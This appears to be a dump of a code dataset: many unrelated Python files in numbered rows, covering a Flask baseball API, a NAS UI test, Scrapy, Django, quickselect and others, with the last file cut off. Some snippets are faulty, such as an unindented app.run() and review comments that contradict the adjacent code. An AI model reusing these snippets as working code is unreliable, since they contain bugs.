FUNC_CONS = [p + f for f in CONSTRAINT_D for p in PREFIX_D] \
          + [p + f for f in CONSTRAINT_DD for p in PREFIX_DD]
def allocDerivMemory():
    """Emit a malloc for every first, second, and advective derivative
    buffer (one ``double*`` of length ``n`` each), via cog."""
    for buffer_name in FUNC_D_I + FUNC_D_IJ + FUNC_AD_I:
        cog.outl("\t double* " + buffer_name + " = (double*)malloc(sizeof(double)*n);")
def computeRHSDerivs():
    """Emit the derivative-routine calls needed by the BSSN right-hand side.

    For every evolved variable: first derivatives in x/y/z; for variables in
    DD, the six second derivatives (pure xx/yy/zz directly, mixed xy/xz/yz
    by differentiating an already-computed first derivative); for variables
    in AD, upwinded advective derivatives.
    """
    for var in D:
        # NOTE(review): hx is passed as the spacing for y and z too --
        # presumably the grid is uniform in all directions; confirm.
        cog.outl("\t deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_D[0] + var ,var))
        cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_D[1] + var ,var))
        cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_D[2] + var ,var))
        if var in DD:
            cog.outl("\t deriv_xx(%s, %s, hx, sz, bflag);" %(PREFIX_DD[0] + var ,var))
            # Mixed partials: d/dy and d/dz of the stored d/dx buffer.
            cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_DD[1] + var , PREFIX_D[0] + var ))
            cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[2] + var , PREFIX_D[0] + var ))
            cog.outl("\t deriv_yy(%s, %s, hx, sz, bflag);" %(PREFIX_DD[3] + var ,var))
            # d/dz of the stored d/dy buffer gives the yz mixed partial.
            cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[4] + var , PREFIX_D[1] + var))
            cog.outl("\t deriv_zz(%s, %s, hx, sz, bflag);" %(PREFIX_DD[5] + var ,var))
        if var in AD:
            cog.outl("\t adv_deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_AD[0] + var ,var))
            cog.outl("\t adv_deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_AD[1] + var ,var))
            cog.outl("\t adv_deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_AD[2] + var ,var))
def deallocDerivMemory():
    """Emit a matching free() for every buffer produced by
    allocDerivMemory(), via cog."""
    for buffer_name in FUNC_D_I + FUNC_D_IJ + FUNC_AD_I:
        cog.outl("\t free(%s);" % (buffer_name,))
|
5,615 | 3b19ee0bbd24b76dd8b933859f6a56c459926861 | from javascript import JSConstructor
from javascript import JSObject
cango = JSConstructor(Cango2D)
shapes2d = JSObject(shapes2D)
tweener = JSConstructor(Tweener)
drag2d = JSConstructor(Drag2D)
svgtocgo2d = JSConstructor(svgToCgo2D)
cgo = cango("plotarea")
x1, y1 = 40, 20
cx1, cy1 = 90, 120
x2, y2 = 120, 100
cx2, cy2 = 130, 20
cx3, cy3 = 150, 120
x3, y3 = 180, 60
#called in scope of dragNdrop obj
def dragC1(mousePos):
    """Drag callback for control point 1: follow the mouse and redraw."""
    global cx1, cy1
    cx1 = mousePos.x
    cy1 = mousePos.y
    drawCurve()
def dragC2(mousePos):
    """Drag callback for control point 2: follow the mouse and redraw."""
    global cx2, cy2
    cx2 = mousePos.x
    cy2 = mousePos.y
    drawCurve()
def dragC3(mousePos):
    """Drag callback for control point 3: follow the mouse and redraw."""
    global cx3, cy3
    cx3 = mousePos.x
    cy3 = mousePos.y
    drawCurve()
def drawCurve():
    """Recompile the bezier curves, guide lines, and draggable control
    points from the current global coordinates and render one frame."""
    # curve change shape so it must be re-compiled each time
    # draw a quadratic bezier from x1,y2 to x2,y2
    qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]
    qbez = cgo.compilePath(qbezdata, 'blue')
    # cubic bezier continuing from the quadratic's endpoint
    cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]
    cbez = cgo.compilePath(cbezdata, 'green')
    # show lines to control point
    data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]
    # semi-transparent gray
    L1 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
    data = ['M', x2, y2, 'L', cx2, cy2]
    L2 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
    data = ['M', x3, y3, 'L', cx3, cy3]
    L3 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
    # draw draggable control points (reposition the pre-compiled circles)
    c1.transform.reset()
    c1.transform.translate(cx1, cy1)
    c2.transform.reset()
    c2.transform.translate(cx2, cy2)
    c3.transform.reset()
    c3.transform.translate(cx3, cy3)
    grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)
    cgo.renderFrame(grp)
# Canvas setup and initial render.
cgo.clearCanvas("lightyellow")
cgo.setWorldCoords(0, 0, 200)
# pre-compile the draggable control point
# NOTE(review): `null` is not a Python builtin -- presumably injected by the
# Brython/javascript bridge environment; confirm it resolves at runtime.
dragObj1 = drag2d(cgo, null, dragC1, null)
c1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c1.enableDrag(dragObj1)
dragObj2 = drag2d(cgo, null, dragC2, null)
c2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c2.enableDrag(dragObj2)
dragObj3 = drag2d(cgo, null, dragC3, null)
c3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c3.enableDrag(dragObj3)
drawCurve() |
5,616 | d03a8076b77851ae4df5cf657ff898eb132c49c3 | # Lahman.py
# Convert to/from web native JSON and Python/RDB types.
import json
# Include Flask packages
from flask import Flask
from flask import request
import copy
import SimpleBO
# The main program that executes. This call creates an instance of a
# class and the constructor starts the runtime.
app = Flask(__name__)
def parse_and_print_args():
    """Split the current Flask request into template args, field list,
    JSON body, and pagination values.

    ``fields``, ``offset`` and ``limit`` are popped out of the query-string
    copy so the remainder can be used as a find-by-template filter.

    :return: tuple ``(in_args, fields, body, offset, limit)``.
    """
    fields = None
    in_args = None
    # FIX: initialize so a request with no query args cannot raise
    # UnboundLocalError at the return below.
    offset = None
    limit = None
    if request.args is not None:
        in_args = dict(copy.copy(request.args))
        fields = copy.copy(in_args.get('fields', None))
        if fields:
            del in_args['fields']
        offset = copy.copy(in_args.get('offset', None))
        if offset:
            del in_args['offset']
        limit = copy.copy(in_args.get('limit', None))
        if limit:
            del in_args['limit']
    try:
        if request.data:
            body = json.loads(request.data)
        else:
            body = None
    except Exception as e:
        print("exception here is: ", e)
        body = None
    print("Request.args : ", json.dumps(in_args))
    # BUG FIX: previously returned (..., limit, offset) while every caller
    # unpacks (..., offset, limit), silently swapping the two pagination
    # values; the return order now matches the callers' names.
    return in_args, fields, body, offset, limit
@app.route('/api/<resource>',methods = ['GET','POST'])
def Basic_resource(resource):
    """Generic collection endpoint: GET lists rows matching the query-string
    template (with pagination links); POST inserts the JSON body."""
    # NOTE(review): parse_and_print_args() returns (..., limit, offset) but
    # this unpacks (..., offset, limit) -- the pagination values arrive
    # swapped; confirm the intended order.
    in_args,fields,body,offset,limit = parse_and_print_args()
    if request.method == 'GET':
        result = SimpleBO.find_by_template(resource,in_args,fields,limit,offset)
        url = request.url
        url_root = request.url_root
        links = SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
        output=[{"data":result,
                 "links":links}]
        return json.dumps(output), 200, \
            {"content-type": "application/json; charset:utf-8"}
    elif request.method == 'POST':
        result = SimpleBO.Insert(resource,body)
        return result
    else:
        # Unreachable in practice: the route only registers GET and POST.
        return "Method " + request.method + " on resource " + resource + \
            " not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/<resource>/<primary_key>',methods = ['GET','PUT','DELETE'])
def Specific_resource(resource,primary_key):
    """Single-row endpoint: GET fetches by primary key, PUT updates from the
    JSON body, DELETE removes the row."""
    in_args,fields,body,offset,limit = parse_and_print_args()
    if request.method == 'GET':
        result = SimpleBO.find_by_primary_key(resource,primary_key,fields)
        return json.dumps(result), 200, \
            {"content-type": "application/json; charset:utf-8"}
    elif request.method == 'PUT':
        result = SimpleBO.Update(resource,body,primary_key)
        return json.dumps(result), 200, \
            {"content-type": "application/json; charset:utf-8"}
    elif request.method == 'DELETE':
        result = SimpleBO.Delete(resource,primary_key)
        return result
    else:
        # Unreachable: only GET/PUT/DELETE are registered on this route.
        return "Method " + request.method + " on resource " + resource + \
            " not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/<resource>/<primary_key>/<related_resource>',methods = ['GET','POST'])
def related_resource(resource,primary_key,related_resource):
    """Sub-resource endpoint: GET lists rows related to one parent row (via
    foreign key) with pagination links; POST inserts into the related table."""
    in_args,fields,body,offset,limit = parse_and_print_args()
    if request.method == 'GET':
        result = SimpleBO.find_by_fk(resource,primary_key,related_resource,in_args,fields,limit,offset)
        url = request.url
        url_root = request.url_root
        all_resource = resource+"/"+primary_key+"/"+related_resource
        links=SimpleBO.generate_links(url,url_root,all_resource,in_args,fields,offset,limit,result)
        output=[{"data":result,
                 "links":links}]
        return json.dumps(output), 200, \
            {"content-type": "application/json; charset:utf-8"}
    elif request.method == 'POST':
        result = SimpleBO.Insert(related_resource,body)
        return json.dumps(result), 200, \
            {"content-type": "application/json; charset:utf-8"}
    else:
        # Unreachable: only GET/POST are registered on this route.
        return "Method " + request.method + " on resource " + resource + \
            " not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/teammates/<playerid>', methods=['GET'])
def get_teammates(playerid):
    """Return the teammates of one player, with pagination links."""
    in_args,fields,body,offset,limit = parse_and_print_args()
    if request.method == 'GET':
        result = SimpleBO.find_teammates(playerid,limit,offset)
        url = request.url
        url_root = request.url_root
        resource = 'teammates/'+playerid
        links=SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
        output=[{"data":result,
                 "links":links}]
        return json.dumps(output), 200, \
            {"content-type": "application/json; charset:utf-8"}
@app.route('/api/people/<playerid>/career_stats', methods=['GET'])
def get_career_stats(playerid):
    """Return career statistics for one player, with pagination links."""
    in_args,fields,body,offset,limit = parse_and_print_args()
    if request.method == 'GET':
        result = SimpleBO.find_career_stats(playerid,limit,offset)
        url = request.url
        url_root = request.url_root
        resource = 'people/'+playerid+'/career_stats'
        links=SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
        output=[{"data":result,
                 "links":links}]
        return json.dumps(output), 200, \
            {"content-type": "application/json; charset:utf-8"}
    else:
        # NOTE(review): unreachable (route only allows GET); if it were ever
        # reached, `resource` is undefined here and would raise NameError.
        return "Method " + request.method + " on resource " + resource + \
            " not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/roster', methods=['GET'])
def get_roster():
    """Return a roster filtered by the query-string args, with pagination
    links."""
    in_args,fields,body,offset,limit = parse_and_print_args()
    if request.method == 'GET':
        result = SimpleBO.find_roster(in_args,limit,offset)
        url = request.url
        url_root = request.url_root
        resource = 'roster'
        links=SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
        output=[{"data":result,
                 "links":links}]
        return json.dumps(output), 200, \
            {"content-type": "application/json; charset:utf-8"}
    else:
        # NOTE(review): unreachable (route only allows GET); if it were ever
        # reached, `resource` is undefined here and would raise NameError.
        return "Method " + request.method + " on resource " + resource + \
            " not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
if __name__ == '__main__':
app.run()
|
5,617 | f4aaf0449bff68814090552ea4f6ccac85dacf1b | # coding=utf-8
"""SCALE UI: feature tests."""
import pytest
import xpaths
from function import (
wait_on_element,
is_element_present,
wait_on_element_disappear
)
from pytest_bdd import (
given,
scenario,
then,
when,
)
# pytest-bdd scenario binding: the body is intentionally empty -- the given/
# when/then step functions below are collected and executed by the scenario.
@pytest.mark.dependency(name='Set_Group')
@scenario('features/NAS-T1250.feature', 'Verify that you can create a new group')
def test_verify_that_you_can_create_a_new_group():
    """Verify that you can create a new group."""
@given('the browser is open, navigate to the SCALE URL, and login')
def the_browser_is_open_navigate_to_the_scale_url_and_login(driver, nas_ip, root_password):
    """the browser is open, navigate to the SCALE URL, and login."""
    # Only (re)navigate when the browser is not already on the NAS UI.
    if nas_ip not in driver.current_url:
        driver.get(f"http://{nas_ip}")
        assert wait_on_element(driver, 10, xpaths.login.user_Input)
    # If the dashboard is not visible we are logged out: fill in the login form.
    if not is_element_present(driver, xpaths.side_Menu.dashboard):
        assert wait_on_element(driver, 10, xpaths.login.user_Input)
        driver.find_element_by_xpath(xpaths.login.user_Input).clear()
        driver.find_element_by_xpath(xpaths.login.user_Input).send_keys('root')
        driver.find_element_by_xpath(xpaths.login.password_Input).clear()
        driver.find_element_by_xpath(xpaths.login.password_Input).send_keys(root_password)
        assert wait_on_element(driver, 5, xpaths.login.signin_Button)
        driver.find_element_by_xpath(xpaths.login.signin_Button).click()
    else:
        # Already logged in: just return to the dashboard.
        assert wait_on_element(driver, 10, xpaths.side_Menu.dashboard, 'clickable')
        driver.find_element_by_xpath(xpaths.side_Menu.dashboard).click()
@when('on the dashboard click on Credentials and Local Groups')
def on_the_dashboard_click_on_credentials_and_local_groups(driver):
    """on the dashboard click on Credentials and Local Groups."""
    # Wait for the dashboard to finish rendering before using the side menu.
    assert wait_on_element(driver, 10, xpaths.dashboard.title)
    assert wait_on_element(driver, 10, xpaths.dashboard.system_Info_Card_Title)
    assert wait_on_element(driver, 10, xpaths.side_Menu.credentials, 'clickable')
    driver.find_element_by_xpath(xpaths.side_Menu.credentials).click()
    assert wait_on_element(driver, 10, xpaths.side_Menu.local_Group, 'clickable')
    driver.find_element_by_xpath(xpaths.side_Menu.local_Group).click()
@then('on the Groups page, click Add')
def on_the_groups_page_click_add(driver):
    """on the Groups page, click Add."""
    assert wait_on_element(driver, 10, xpaths.groups.title)
    assert wait_on_element(driver, 10, xpaths.button.add, 'clickable')
    driver.find_element_by_xpath(xpaths.button.add).click()
@then('on the Add Group side box input the group name')
def on_the_add_group_side_box_input_the_group_name(driver):
    """on the Add Group side box input the group name."""
    assert wait_on_element(driver, 7, xpaths.add_Group.title)
    assert wait_on_element(driver, 7, xpaths.add_Group.name_Input, 'inputable')
    # Clear any pre-filled value before typing the test group name.
    driver.find_element_by_xpath(xpaths.add_Group.name_Input).clear()
    driver.find_element_by_xpath(xpaths.add_Group.name_Input).send_keys('qetest')
@then('click save and verify the group was added')
def click_save_and_verify_the_group_was_added(driver):
    """click save and verify the group was added."""
    assert wait_on_element(driver, 7, xpaths.button.save, 'clickable')
    driver.find_element_by_xpath(xpaths.button.save).click()
    # Wait for the save spinner to disappear, then confirm the new group
    # shows up in the groups list.
    assert wait_on_element_disappear(driver, 20, xpaths.progress.progressbar)
    assert wait_on_element(driver, 10, xpaths.groups.title)
    assert wait_on_element(driver, 10, xpaths.groups.qetest_Name)
|
5,618 | 129c7f349e2723d9555da44ae62f7cfb7227b9ae | from django.shortcuts import render
from django.views.generic import View #导入View
from .models import UpdateDbData,User
from wanwenyc.settings import DJANGO_SERVER_YUMING
from .forms import UpdateDbDataForm
# Create your views here.
#添加场景的view
class UpdateDbDataView(View): # subclasses Django's class-based View
    """
    Page handler for copying/editing test data (UpdateDbData records).

    get  -- render the edit page for one record, with permission checks.
    post -- validate the submitted UpdateDbDataForm and save a new record.
    """
    def get(self,request,testupdatadb_id):
        # The special 'check' account is read-only: show the "cannot add" page.
        if request.user.username == 'check':
            return render(request, "canNotAddupdatedbdata.html",{
                "django_server_yuming":DJANGO_SERVER_YUMING
            })
        elif request.user.is_active:
            updatedbdata = UpdateDbData.objects.get(id=int(testupdatadb_id)) # fetch the requested record
            updatedbdata_all = UpdateDbData.objects.all().order_by("-id")
            return render(request,"updatedbdata/updatedbdata.html",
                          {"updatedbdata":updatedbdata,
                           "updatedbdata_all":updatedbdata_all,
                           "django_server_yuming": DJANGO_SERVER_YUMING,
                           })
        else:
            # Anonymous / inactive users get a generic error page.
            return render(request,"addContentError.html",{
                "django_server_yuming": DJANGO_SERVER_YUMING
            })
    def post(self, request,testupdatadb_id):
        username = request.user.username
        updatedbdata_all = UpdateDbData.objects.all().order_by("-id")
        updatedbdata_form = UpdateDbDataForm(request.POST) # bind the submitted POST data to the form
        updatedbdata = UpdateDbData.objects.get(id=int(testupdatadb_id)) # record being viewed (used when re-rendering on error)
        if updatedbdata_form.is_valid(): # is_valid() reports validation errors
            updatedbdata_form.save(commit=True) # persist the new record to the database
            zj = UpdateDbData.objects.all().order_by('-add_time')[:1][0] # most recently added record, by add_time
            user = User.objects.get(username=username)
            # Stamp the freshly-created record with the submitting user's id.
            zj.write_user_id = user.id
            zj.save()
            updatedbdataid = zj.id
            updatedbdataadd = UpdateDbData.objects.get(id=int(updatedbdataid)) # re-fetch the saved record
            return render(request, "updatedbdata/updatedbdata.html", {
                "updatedbdata": updatedbdataadd,
                "updatedbdata_all": updatedbdata_all,
                "sumsg":u"添加测试用例---【{}】---成功,请继续添加".format(updatedbdataadd.test_case_title),
                "django_server_yuming": DJANGO_SERVER_YUMING,
            })
        else:
            return render(request, 'updatedbdata/updatedbdataForm.html', {
                "updatedbdata": updatedbdata,
                "updatedbdata_all": updatedbdata_all,
                "updatedbdataform": updatedbdata_form,
                "errmsg":u"添加失败,请重新添加,添加时请检查各个字段是否填写",
                "django_server_yuming": DJANGO_SERVER_YUMING,
            }) # re-render the form with the submitted values so the user can correct them
|
5,619 | 700d6e0c7dab58ed0157265ff78021923c17e397 | j= float(input("juros"))
Q0= 1500  # principal (initial amount invested)
t= 36  # number of compounding periods
# Compound-interest future value: Qf = Q0 * (1 + j) ** t,
# where j is the per-period rate read from the user above.
Qf=Q0*(1+j)**t
print(round(Qf,2))
5,620 | 8a7536b998a6d122e2e7529af1ebe2a0f025303f | import requests
from datetime import date
from datetime import timedelta
def get_offset_date(modifed_date, offset_in_days):
    """Return the ISO-8601 string for *modifed_date* shifted by *offset_in_days* days."""
    shifted = modifed_date + timedelta(days=int(offset_in_days))
    return date.isoformat(shifted)
def get_trending_repositories(start_search_date, number_of_results=20):
    """Fetch the most-starred GitHub repositories created after *start_search_date*.

    start_search_date -- ISO date string used in the ``created:>`` qualifier.
    number_of_results -- page size requested from the search API.
    Returns a list of dicts with repo name, owner login, star count,
    open-issue count and HTML URL.  Performs a network request; there is no
    error handling, so a failed or rate-limited request raises (KeyError
    when the response lacks 'items').
    """
    github_api_uri = 'https://api.github.com'
    query_search_url = '{}/search/repositories'.format(github_api_uri)
    query_parameters = {'q': 'created:>{}'.format(start_search_date),
                        'sort': 'stars',
                        'order': 'desc',
                        'per_page': number_of_results}
    trending_repositories_json_list = requests.get(query_search_url,
                                                   query_parameters).json()['items']
    result_trending_list = []
    for repository in trending_repositories_json_list:
        repository_name = repository['name']
        repoditory_owner = repository['owner']['login']
        # Flatten the API payload into the small dict shape the printer expects.
        result_trending_list.append({'repo_name': str(repository_name),
                                     'repo_owner': str(repoditory_owner),
                                     'stars': repository['stargazers_count'],
                                     'issues': repository['open_issues'],
                                     'url': repository['html_url']
                                     })
    return result_trending_list
def get_open_issues_amount(repo_owner, repo_name):
    """Return how many issues on the first results page of owner/repo are open.

    Performs a network request against the GitHub issues API; no error
    handling or pagination.
    """
    github_api_uri = 'https://api.github.com'
    query_search_url = '{0}/repos/{1}/{2}/issues'.format(github_api_uri,
                                                         repo_owner,
                                                         repo_name)
    issues_json_data = requests.get(query_search_url).json()
    # Count only issues whose state is 'open'.
    return sum(1 for issue in issues_json_data if issue['state'] == 'open')
def print_result_to_console(repositories=None, since_date=None, results_count=None):
    """Pretty-print a list of trending repositories to stdout.

    All parameters default to the module-level globals set in the
    ``__main__`` block (``top_repositories_list``, ``week_earlier_date``,
    ``number_of_results``), which keeps the original zero-argument call
    working while also making the function callable — and testable — with
    explicit arguments instead of relying on globals.

    repositories  -- list of dicts as built by get_trending_repositories
    since_date    -- date string shown in the header line
    results_count -- count announced in the header line
    """
    if repositories is None:
        repositories = top_repositories_list
    if since_date is None:
        since_date = week_earlier_date
    if results_count is None:
        results_count = number_of_results
    print('Program prints {} most popular repositories since {}\n'.format(results_count, since_date))
    for index, repo in enumerate(repositories):
        # Repositories with zero open issues get flagged as good candidates.
        good_choice_label = 'Try it!' if not repo['issues'] else ''
        print('{0:2} {4:7} {1:70} {2:5} stars {3:2} issues'.format(index + 1,
                                                                   repo['url'],
                                                                   repo['stars'],
                                                                   repo['issues'],
                                                                   good_choice_label))
if __name__ == '__main__':
    # Look one week back from today for freshly-created repositories.
    date_offset_in_days = -7
    week_earlier_date = get_offset_date(date.today(), date_offset_in_days)
    number_of_results = 20
    top_repositories_list = get_trending_repositories(week_earlier_date,
                                                      number_of_results)
    print_result_to_console()
|
5,621 | 40aa9e7cf0aaca24054297ca80aaf468ba485966 | """ binary_adder.py: Takes two arrays representing binary numbers,
adds them together. """
__author__ = "David Vaillant"
__credits__ = "CLRS, Chapter 2.1"
def binary_add(x, y):
    """ Adds two binary arrays together.

    x, y -- equal-length lists of 0/1 digits, most significant digit first.
    Returns the (len+1)-digit sum, most significant first.  Returns None
    when the lengths differ and False when a non-binary digit is found
    (both behaviours match what unit_test expects).
    """
    # Bug fix: this used to be an assert, which crashed unit_test's
    # mismatched-length case instead of producing the expected None.
    if len(x) != len(y):
        return None
    z = [0] * (len(x)+1)
    # Walk the digits least-significant-first; z[a] is the a-th output digit
    # (LSB first) and z[a+1] accumulates the carry.
    for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):
        # Makes sure that the array is a binary array.
        # Strictly speaking, not necessary. But nice.
        if i not in [0, 1]: return False
        if j not in [0, 1]: return False
        # if i and j are both 1: emit 0 here, carry 1 into the next column
        if i and j:
            z[a] += 0
            z[a+1] += 1
        # if only one of them is 1
        elif i or j:
            z[a] += 1
        # if they're both 0
        else: pass
        # Resolve a carry from the previous column that pushed this digit to 2.
        if z[a] == 2:
            z[a+1] += 1
            z[a] -= 2
    # Flip back to most-significant-first order.
    return z[::-1]
def unit_test():
    """ Unit tests.

    x_arr/y_arr are paired inputs; z_arr holds the expected sums.  The
    third case has mismatched lengths and expects None.  Results are
    compared and reported on stdout rather than asserted.
    """
    x_arr = ( [1, 0, 0],
              [1],
              [0],
              [1, 0, 0, 1],
              [1, 1, 1, 1],
              [1, 0, 0, 0, 0])
    y_arr = ( [0, 1, 1],
              [0],
              [0, 0],
              [1, 1, 0, 0],
              [0, 0, 0, 0],
              [1, 0, 0, 0, 0])
    z_arr = ( [0, 1, 1, 1],
              [0, 1],
              None,
              [1, 0, 1, 0, 1],
              [0, 1, 1, 1, 1],
              [1, 0, 0, 0, 0, 0] )
    for a, (x, y) in enumerate(zip(x_arr, y_arr)):
        sum = binary_add(x, y)
        print("Adding {} to {}.".format(x, y))
        if sum == z_arr[a]:
            print("Successfully returned {}.".format(sum))
        else:
            print("Got {} instead of {}.".format(sum, z_arr[a]))
        print()
if __name__ == "__main__":
    # Run the self-checks when executed as a script.
    unit_test()
|
5,622 | d827c59871d58e098009c22320af73f8f40169bb | from scrapy.selector import HtmlXPathSelector
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors.sgml import SgmlLinkExtractor
from scrapy.item import Item, Field
import scrapy
import config
from scrapy.linkextractors import LinkExtractor
from scrapy.http import Request
class BrokenItem(Item):
    # Scrapy item describing one broken-link occurrence.
    url = Field()      # the URL that returned an error
    referer = Field()  # page that linked to it
    status = Field()   # HTTP status code received
class BrokenLinksSpider(CrawlSpider):
    """Crawl the configured site and append every 404 URL to 404links.txt."""
    # Let 404 responses reach parse() instead of being filtered out by Scrapy.
    handle_httpstatus_list = [404]
    name = config.name
    allowed_domains = config.allowed_domains
    start_urls = config.start_urls

    def parse(self, response):
        """Record 404s; otherwise follow every in-domain link recursively."""
        if response.status == 404:
            # Bug fix: the file was opened and closed manually, leaking the
            # handle if write() failed; the context manager guarantees close.
            with open("404links.txt", "a") as report:
                report.write(response.url + "\n")
        else:
            extractor = LinkExtractor(allow_domains=self.allowed_domains)
            links = extractor.extract_links(response)
            for link in links:
                yield Request(link.url, callback=self.parse)
|
5,623 | 12ca9a81574d34d1004ac9ebcb2ee4b31d7171e2 | variable_1 = 100
variable_2 = 500
variable_3 = 222.5
variable_4 = 'Hello'
variable_5 = 'world'
# Demonstrate print()'s sep/end keyword arguments.
print(variable_1, variable_2, variable_3, sep=', ')
print(variable_4, variable_5, sep=', ', end='!\n')
# Read user data; input() always returns a string.
user_age = input('Введите ваш возраст: ')
user_name = input('Введите ваше имя: ')
print(variable_4 + ', ' + user_name + '! ' + 'Ваш возраст: ' + user_age)
|
5,624 | 61388b2edb35055cccbdc98ed52caedcd0b02983 | import numpy as np
import string
import networkx as nx
import matplotlib.pyplot as plt
def PlotUndirectedGraph(A,color):
    """Draw the weighted graph encoded by adjacency matrix *A* with networkx.

    A     -- square matrix; only the upper triangle (i < j) is read, so the
             matrix is effectively treated as undirected.
    color -- per-node values for the Pastel1 colormap, or an empty sequence
             for a uniform sky-blue fill.
    Nodes are labelled A, B, C, ... in row order.  plt.show() blocks until
    the window is closed.
    """
    NodesNames = list(string.ascii_uppercase);
    NNodes = A.shape[0]
    # NOTE(review): a DiGraph is built for an "undirected" plot (arrows are
    # suppressed below) — confirm nx.Graph() was not intended.
    G = nx.DiGraph()
    for i in range(NNodes):
        G.add_node(NodesNames[i])
    # Add one edge per nonzero upper-triangle entry, weighted by its value.
    for i in range(NNodes):
        for j in range(i+1,NNodes):
            if A[i,j] != 0:
                G.add_edge(NodesNames[i],NodesNames[j],weight=A[i,j])
    pos = nx.spring_layout(G)
    edge_labels=dict([((u,v,),d['weight'])
                 for u,v,d in G.edges(data=True)])
    if len(color)==0:
        #edge_colors = ['black' if not edge in red_edges else 'red' for edge in G.edges()]
        nx.draw_networkx_nodes(G, pos, node_size=400, node_color = 'skyblue')
    else:
        nx.draw_networkx_nodes(G, pos, node_size=400, node_color = color, cmap=plt.cm.Pastel1)
    #nx.draw(G,pos, node_color = values, node_size=1500,edge_color=edge_colors,edge_cmap=plt.cm.Reds)
    # NOTE(review): draw_networkx_labels has no 'edge_labels' parameter (node
    # labels use 'labels'); recent networkx versions may reject this call —
    # verify against the installed networkx release.
    nx.draw_networkx_labels(G, pos, edge_labels=edge_labels)
    nx.draw_networkx_edges(G, pos, arrows = False)
    nx.draw_networkx_edge_labels(G, pos, edge_labels=edge_labels)
    plt.show()
|
5,625 | f9234741c6356b4677b5d32ffea86549d001c258 | """
Quick select (randomized selection algorithm)
- based on quick sort (ch8_sorting); used to obtain the ith-smallest element in an unordered list of items (e.g.numbers)
"""
def swap(unsorted_array, a, b):
    """Exchange the elements at indices *a* and *b* in place."""
    unsorted_array[a], unsorted_array[b] = unsorted_array[b], unsorted_array[a]
def partition(unsorted_array, first_index, last_index):
    """Partition unsorted_array[first_index..last_index] around its first element.

    Mutates the list in place and returns the pivot's final index: elements
    left of it are <= pivot, elements right of it are >= pivot.
    """
    # these 2 lines added, comparing to quick_sort partition
    # => there's only one element in our sublist => return any of the function parameters
    if first_index == last_index:
        return first_index
    # This choice to make the 1st element the pivot is a random decision.
    # It often does not yield a good split and subsequently a good partition.
    # However, the ith element will eventually be found.
    pivot = unsorted_array[first_index]
    pivot_index = first_index
    index_of_last_element = last_index
    # Two pointers converge: one scanning right for elements >= pivot,
    # one scanning left for elements <= pivot.
    less_than_pivot_index = index_of_last_element
    greater_than_pivot_index = first_index + 1
    while True:
        while unsorted_array[greater_than_pivot_index] < pivot and greater_than_pivot_index < last_index:
            greater_than_pivot_index += 1
        while unsorted_array[less_than_pivot_index] > pivot and less_than_pivot_index >= first_index:
            less_than_pivot_index -= 1
        if greater_than_pivot_index < less_than_pivot_index:
            # NOTE(review): 'temp' is never read — swap() already exchanges both slots.
            temp = unsorted_array[greater_than_pivot_index]
            swap(unsorted_array, greater_than_pivot_index, less_than_pivot_index)
        else:
            break
    # Drop the pivot into its final position.
    unsorted_array[pivot_index] = unsorted_array[less_than_pivot_index]
    unsorted_array[less_than_pivot_index] = pivot
    # returns the pivot index pointed to by less_than_pivot_index
    return less_than_pivot_index
# parameters: the index of the first, the last, the ith element
def quick_select_helper(unsorted_array, left, right, k):
    """Recursively narrow the search to the side of the partition containing index k."""
    # returns the split index = the position in the unordered list where
    # all elements between right to split-1 are < the element contained in the array split,
    # while all elements between split+1 to left are greater.
    split_point = partition(unsorted_array, left, right)
    if split_point == k:
        return unsorted_array[k]
    # => the kth-smallest item should exist/be found between split+1 and right:
    elif split_point < k:
        return quick_select_helper(unsorted_array, split_point + 1, right, k)
    else:
        return quick_select_helper(unsorted_array, left, split_point - 1, k)
def quick_select(unsorted_array, k):
    """Return the k-th smallest element (0-based) of *unsorted_array*.

    The list is partially reordered in place as a side effect.
    Bug fix: the helper's result was previously discarded, so this
    function always returned None.
    """
    return quick_select_helper(unsorted_array, 0, len(unsorted_array) - 1, k)
u_array = [43, 3, 20, 4, 89, 77]
# Demo: select the 2nd-smallest element; the list is partially reordered
# in place by the partitioning, which is what the print shows.
quick_select(u_array, 1)
print(u_array)
|
5,626 | 60b1a77d2de4a52ae9597f88917c4a3996c99923 | from src.secStructure import *
from suffix_trees import STree
import math
import re
def test_processData():
    """End-to-end check of SecStructure.processData.

    Covers k-mer profiles built with and without secondary-structure peak
    positions, the derived structure-element templates and dot-bracket
    strings, and behaviour under several reduced/'flawed' alphabets.
    """
    # Test1: ignoring peak position
    data = ['example/example1.fa', 'example/example2.fa']
    struct_data = ['example/exampleStrucData/exampleStructuralData1.fa',
                   'example/exampleStrucData/exampleStructuralData2.fa']
    k = 3
    top = 10
    peak = None
    feature = None
    cmd = False
    no_sec_peak = 1  # True
    # Executing
